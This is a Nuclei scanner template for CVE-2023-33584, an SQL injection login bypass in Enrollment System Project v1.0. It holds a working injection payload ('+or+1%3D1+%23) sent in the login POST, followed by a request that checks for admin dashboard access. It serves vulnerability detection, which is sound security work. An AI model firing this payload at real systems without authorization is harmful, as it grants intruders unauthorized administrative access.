nuclei-templates/http/cves/2023/CVE-2023-33584.yaml

42 lines
1.5 KiB
YAML

id: CVE-2023-33584
info:
name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
author: r3Y3r53
severity: critical
description: |
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
reference:
- https://www.exploit-db.com/exploits/51501
- https://nvd.nist.gov/vuln/detail/CVE-2023-33584
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33584
cwe-id: CWE-89
metadata:
verified: true
tags: cve,cve2023,sqli,exploitdb,unauth,enrollment
http:
- raw:
- |
POST /enrollment/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username='+or+1%3D1+%23&password={{randstr}}
- |
GET /enrollment/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and